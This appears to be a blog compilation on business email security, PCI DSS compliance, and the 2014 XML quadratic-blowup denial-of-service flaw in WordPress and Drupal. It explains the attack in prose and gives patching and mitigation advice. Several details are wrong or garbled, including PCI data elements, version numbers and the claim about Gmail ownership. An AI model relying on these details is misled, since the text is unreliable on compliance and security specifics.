Security, Contractual agreements and Compliance:

Why you might need an email client

In today’s times if one were to say that he is planning to buy an email software, anyone would put a question mark to that decision. It would be easy to pick any one of the umpteen free options available now a days for free email and collaborations. Any small business would get sufficient services and features from these free email solutions and it will mean saving a lot of money. Also it would be convenient and one can do away with the need of an in-house mail server. These free or low priced email solutions are also capable to provide you with an email address that will bear your company’s name in it.

Security

With these free email solutions providing you with almost all that you require , why would anyone want to buy one? It is definitely going to cost way more. And also there will be a persistent requirement to keep it error free and updated. The answer to this question is that not all businesses are the same and so are not all the requirements. There can be business for which it might be necessary to get premium security as far as their email content is concerned. They cannot, at any cost, afford to have the security of their email transactions compromised or leaked or known to any third party. Such businesses need to buy specific email solution which promises tight security. Free services like Google have clearly mentioned in their fine prints that everything that is posted on or through Gmail is their property and can be read/ used by them. A security sensitive business cannot use them. It will be a good idea to put in some investment and get a good email solution if your business too cannot afford to get its email security compromised.

Contractual Obligations

Whenever you go ahead and buy an email solution, it is extremely necessary to read the fine prints of the contract properly. You are putting in a lot of money and at the end of the day you should not feel fooled or cheated. Ensure that the contract clearly states that all your specific requirements will be met and that all the features that you need will be there. Also ensure that it does not limit or cap any service or feature. Anything thing that is unclear or ambiguous should be discussed beforehand and clarified and modified if required.

Compliance

Every business stream or industry how so ever small it might be, does have its own guidelines and norms. There are set standards which everybody who belongs to that industry should meet and should abide by the rules. Having an email and using will also be affected by these rules. When you go to pick your email solution you have to take into considerations the norms specific to your business and you will have to choose accordingly. You do not have a free say there and it will indeed be an intelligent decision to go along with the flow. You have to carefully pick what you will use as your email solution so that it complies to the industry standards.

Conclusion

There is no doubt that free email service providers like Google, Yahoo! or Outlook are very popular and millions of people use them without any problem. They are popular and are free. But before you decide to start using them for your business you need to ensure that it will not create any major concerns for you like security or compliance. If you feel so then there are any number of companies who will provide you exactly the email solution that you require as per your industry standard. Do not hesitate in picking up the right one and go ahead!

 

 

PCI Data Security Standards

We all our aware of the technology of internet banking- technology that has made the process of payment and funding so easy, fast and moreover secure that huge and immediate transaction could be made within no seconds, no matter when and where you are. The most important aspect that has made this technology so popular is the SECURITY it provides to each and every individual’s transaction. The transaction is provided by the PCL-DSS.

The Payment Card Industry Data Security Standard is a worldwide accepted set of policies and procedures intended to provide and optimize security to credit, debit, cash cards and other online transactions and protect cardholders against misuse of their personal information. The PC-DSS was created jointly by Visa, MasterCard, American express and Discover. The PCL-DSS was defined by the Payment Card Industry Security Standard Council to emphasize on protecting the personal information of the cardholders and to reduce credit card fraud via its exposure.

The PCI DSS originally began as 5 different programs:

  • Visa’s Cardholder information security program.
  • MasterCard’s Site Data Protection
  • America Express’ Data Security Operation Policy
  • Discover’s Information Security & Compliance
  • JCB’s Data Security Program

The PCI DSS Council was formed and on December 15th 2004, these companies aligned their individual policies and released version 1.0 of the PCI DSS. Later, versions 1.1, 1.2 1.1 Sunsetted, 1.2.1, 2.0 were also released. Currently, version 3.0 was released in January 2014 and will continue till 31st December 2016.

The PCI DSS has six major objectives:

  • First, a secure network must be maintained in which transactions can be conducted. It involves the use of firewalls that are vigorous enough to be effective without causing gratuitous inconvenience to cardholders or vendors. Specialized firewalls are available for wireless LANs, which are highly vulnerable to eavesdropping and attacks by malicious hackers. In addition, authentication data such as personal identification numbers (PINs) and passwords must not involve defaults supplied by the vendors. Customers should be able to conveniently and frequently change such data.
  • Second, cardholder information must be protected wherever it is stored. Repositories with vital data such as dates of birth, mothers’ maiden names, Social Security numbers, phone numbers and mailing addresses should be secure against hacking. When cardholder data is transmitted through public networks, that data must be encrypted in an effective way. Digital encryption is important in all forms of credit-card transactions, but particularly in e-commerce conducted on the Internet.
  • Third, systems should be protected against the activities of malicious hackers by using frequently updated anti-virus software, anti-spyware programs, and other anti-malware solutions. All applications should be free of bugs and vulnerabilities that might lead to exploits in which cardholder data could be stolen or altered. Patches offered by software and operating system vendors should be regularly installed to ensure the highest possible level of vulnerability management.
  • Fourth, access to system information and operations should be restricted and controlled. Cardholders should not have to provide information to businesses unless those businesses must know that information to protect them and effectively carry out a transaction. Every person who uses a computer in the system must be assigned a unique and confidential identification name or number. Cardholder data should be protected physically as well as electronically. Examples include the use of document shredders, avoidance of unnecessary paper document duplication, and locks and chains on dumpsters to discourage criminals who would otherwise rummage through the trash.
  • Fifth, networks must be constantly monitored and regularly tested to ensure that all security measures and processes are in place, are functioning properly, and are kept up-do-date. For example, anti-virus and anti-spyware programs should be provided with the latest definitions and signatures. These programs should scan all exchanged data, all applications, all random-access memory (RAM) and all storage media frequently if not continuously.
  • Sixth, a formal information security policy must be defined, maintained, and followed at all times and by all participating entities. Enforcement measures such as audits and penalties for non-compliance may be necessary.

These above objectives are also the requirements of PCI DSS Compliance.

The PCI DSS program benefits Level 4 merchants, though all merchants are required to be compliant. Level 4 merchants are all merchants regardless of acceptance channels processing less than 20,000 Master or Visa Card ecommerce transactions per year and all other merchants processing up to 1 million MasterCard or Visa transaction per year. Customer card security is of great importance to the merchants. This is so because merchants’ business depends on their reputation and integrity. Ensuring card holder data to be secure allows them to grow their business while maintaining the integrity of their reputation by building the trust of the card holder. It also benefits device vendors and manufacturers.

The PCI data Security Standard Council has provided certain tools to assist organizations validate their compliance that includes Self Assessment Questionnaires. The chart below shows some of the tools available to help organizations PCI-DSS Compliant.

For device vendors and manufacturers, the Council provides the PIN Transaction Security (PTS) requirements, which contains a single set of requirements for all personal identification number (PIN) terminals, including POS devices, encrypting PIN pads and unattended payment terminals. To help software vendors and others develop secure payment applications, the Council maintains Payment Application Data Security (PA-DSS) and a list of Validated Applications. The Council also provides training to professional firms and individuals so that they can assist organizations with their compliance efforts. The Council maintains public resource as lists of Qualified Security Assessor (QSAs), Payment Application Qualified Security Assessors (PA-QSAs), and Approved Scanning Vendors (ASVs). Large firms seeking to educate their employees can take advantage of the Internal Security Assessor (ISA) education program.

But what is the need to comply with the PCI Security Standards?

  • Compliance with the PCI DSS means that your systems are secure and the customers can trust you with their sensitive payment card information.
  • If you succeed in building your customers trust in you, the customer would feel secure and comfortable enough to recommend your services again and even to others also.
  • Compliance is an ongoing process and not a one-time event. It helps prevent security breaches and theft of payment card data, not just today, but even in future, since the PCI Council works constantly to monitor threats and improve the industry’s means of dealing with them, through enhancements to PCI Security Standards and by the training of security professionals.
  • When you stay compliant, you become a part of a united, global response to fight against payment card data compromise.
    There are many indirect benefits of PCI DSS compliance too.
  • Through the efforts to comply with PCI Security standards, you will likely be prepared better to comply with other regulations such as HIPAA, SOX , etc
  • You would have a basis for a corporate security strategy.

The PCI DSS applies wherever account data is stored, processed or transmitted. Account Data consist of cardholder’s following information:

  • Primary Account Number (PAN) is the required factor in the applicability of PCI DSS. If PAN is not involved in processing or transaction, PCI DSS does not apply.
  • Cardholder Name, Expiration date (CVC/CVV/CID) or Service Code (PIN/PIN Blocks) are used in process or transaction, they need to be protected according to the PCI DSS requirements.

The PCI DSS security requirements apply to all system components that are defined as any network component, server, or application that is included in or connected to the cardholder data environment. They also include any virtualized components such as virtual machines, virtual switches/routers, virtual appliances, virtual applications/desktops, and hypervisors. The cardholder data environment is comprised of people, processes and technology that store, process or transmit cardholder data or sensitive authentication data. Network components include but are not limited to firewalls, switches, routers, wireless access points, network appliances, and other security appliances. Server types include, but are not limited to the following: web, application, database, authentication, mail, proxy, network time protocol (NTP), and domain name server (DNS). Applications include all purchased and custom applications, including internal and external applications.

The first step of a PCI DSS assessment is to accurately determine the scope of the review. At least annually and prior to the annual assessment, the assessed entity should confirm the accuracy of their PCI DSS scope by identifying all locations and flows of cardholder data and ensuring they are included in the PCI DSS scope. To confirm the accuracy and appropriateness of PCI DSS scope, perform the following:

  • The assessed entity identifies and documents the existence of all cardholder data in their environment, to verify that no cardholder data exists outside of the currently defined cardholder data environment (CDE).
  • Once all locations of cardholder data are identified and documented, the entity uses the results to verify that PCI DSS scope is appropriate (for example, the results may be a diagram or an inventory of cardholder data locations).
  • The entity considers any cardholder data found to be in scope of the PCI DSS assessment and part of the CDE unless such data is deleted or migrated/consolidated into the currently defined CDE.
  • The entity retains documentation that shows how PCI DSS scope was confirmed and the results, for assessor review and/or for reference during the next annual PCI SCC scope confirmation activity. (REF: PCI DSS Council)

I hereby conclude that if you want your business to grow securely, and by winning your customers’ trust and confidence on you, compliant with the PCI DSS and remove all breaches and hindrances of fraud and distrust.

WordPress/Drupal Vulnerability

If your website runs on CMS WordPress or Drupal, update your software now or else you would lose all your data as well as your machine. Why so?? Since these softwares are suffering from certain vulnerabilities, around 100million websites are in threat. Let us know more.

Two of the most popular and widely used open-source Content management systems, Drupal and WordPress are facing vulnerabilities that can affect millions of websites. The two companies are coordinating with each other, for the first time to get rid of the flaw.

The flaw was discovered by Nir Goldshlager, a salesforce.com researcher. According to him, with a few keystrokes the entire website of Drupal or wordpress can be taken down easily. The flaw is a potential denial of service (Dos) issue with the XML processing module by both WordPress and Drupal. The flaw is so highlighted because US government websites including whiteHouse.gov uses Drupal. According to a post by wordpress, the wordpress issue exists in PHP’s XML processing and updating could protect against certain brute force attacks and also addresses possible code execution vulnerabilities. A post by Drupal website says that Drupal is affected because the PHP XML parser used by a publicly available XML-RPC endpoint is vulnerable to an XML entity expansion attack.
This flaw is predicated on a popular cyber-attack, known as XML Quadratic Blow Up attack. This attack distorts the Memory Limit and MySQL, and Apache Max client works.

But what is Denial of Service (Dos) attack? It is an attempt to make a resource or a machine unavailable to a user who requested for it. However, the reasons and motives behind the denial may vary, but when intentionally done, it consists of efforts to interrupt or suspend services of a host temporarily. These attacks are sent by one person or a system.

The version affected by these attacks are wordpress 3.5-3.9 and Drupal 6x-7x. The Quadratic Blowup Attack repeats one large entity with tens of thousands of characters over and over again. Due to this, an XML document of few KBs can end up requiring up to hundreds of MBs and even GBs. This heaviness can bring down entire website or server down easily. Here, the question arises that how this attack is exploited? The default memory allocation limit for PHP (the language that WordPress and Drupal are written in) is 128MB per process. In theory, this means that you can’t exceed the 128MB limit with an XML bomb request. But the problem arises here. Apache has its “Max Clients” property set to 256 by default. Meanwhile, MySQL, the database that WordPress and Drupal use, has its default “Max Connections” value set to 151. If we multiply those connections against one another (128×151), we get 19328MB — which will consume all available memory. To successfully attack the server, the attacker needs to fingerprint the available memory limit on the target server. If the attack overwrites the PHP limit, the server will reject the overwrite, rendering the attack unsuccessful. A successful attack, however, will return the injected payload as a result. This will bring down the system.

The risks created due to these attacks are:

  • Service unavailable
  • 100% RAM and CPU Usage
  • Traffic on server
  • Server breakdown

After the disclosure of this flaw, Nir Goldshlager tried to find ways to resolve this issue and he was finally succeeded. The way by which the flaw could be destroyed is by updating both the softwares to their latest versions. Drupal and WordPress have released the updates to plug the flaw but it is still up to the users of these two CMS to use them on their sites. It is advised to the users of Drupal and wordpress to update their softwares immediately. To fix the flaw at a minute level, WordPress 3.7 introduced automatic updates. This allows security patches to get rolled out ton users automatically.

WordPress users are strongly advised to upgrade their sites to wordpress version 3.9.2. This version of wordpress has the capability to fix the possible DoS issue in PHP’s XML processing. Since the vulnerability is present in WordPress 3.5 to 3.9.1, there are several sites that need to be manually updated in order to be protected. Automatic updates for security releases were introduced in WordPress 3.7, leaving users of 3.6 and 3.5 especially vulnerable. WordPress 3.9.2 has some security updates that helps protect against this flaw:

  • Fixes a possible but unlikely code execution when processing widgets (WordPress is not affected by default), discovered by Alex Concha of the WordPress security team.
  • Prevents information disclosure through XML entity attacks in the external GetID3 library, reported by Ivan Novikov of ONSec.
  • Adds protections against brute attacks against CSRF tokens, reported by David Tomaschik of the Google Security Team.
  • Contains some additional security hardening, like preventing cross-site scripting that could be triggered only by administrators.

Users can update to version 3.9.2 immediately by browsing to Dashboard > Updates in the backend of WordPress. Sites that have automatic updates configured will be updated within 12 hours. Sites using WordPress 3.8.3 or 3.7.3 will be updated to 3.8.4 or 3.7.4. Older versions of WordPress are not supported, so it is recommended to update to 3.9.2, the latest.

Drupal 7.3.1 and 6.3.3 is a security release against security vulnerability.

  1. As of this release, the XML-RPC system in Drupal core will ignore information in <?xml> declarations contained within XML-RPC messages (for example, XML version or character encoding information). This is not expected to matter for the vast majority of use cases.
  2. The XML-RPC system and OpenID XRDS parser will also reject messages that contain over 30,000 XML tags within them. This limit is not expected to matter for the vast majority of use cases. If you need to process an XML-RPC message that is larger than that, you can change the limit by setting the “xmlrpc_message_maximum_tag_count” variable to a higher value. For example, in settings.php:

<?php
// Allow XML-RPC messages with up to 50,000 XML tags to be processed.
$conf['xmlrpc_message_maximum_tag_count'] = 50000;
?>

Do not set the value higher than you need, since allowing too many XML tags per XML-RPC message increases your site’s vulnerability to denial of service attacks. The OpenID XRDS parser has a similar variable

(“openid_xrds_maximum_tag_count”) which can be used in a similar way.

If you are unable to install the latest version of Drupal immediately, you can alternatively remove the xmlrpc.php file from the root of Drupal core (or add a rule to .htaccess to prevent access to xmlrpc.php) and disable the OpenID module. These steps are sufficient to mitigate the vulnerability in Drupal core if your site does not require the use of XML-RPC or OpenID functionality. However, this mitigation will not be effective if you are using a contributed module that exposes Drupal’s XML-RPC API at a different URL (for example, the Services module); updating Drupal core is therefore strongly recommended.

Hereby I conclude that update your websites to the latest versions for Drupal and WordPress and secure your websites.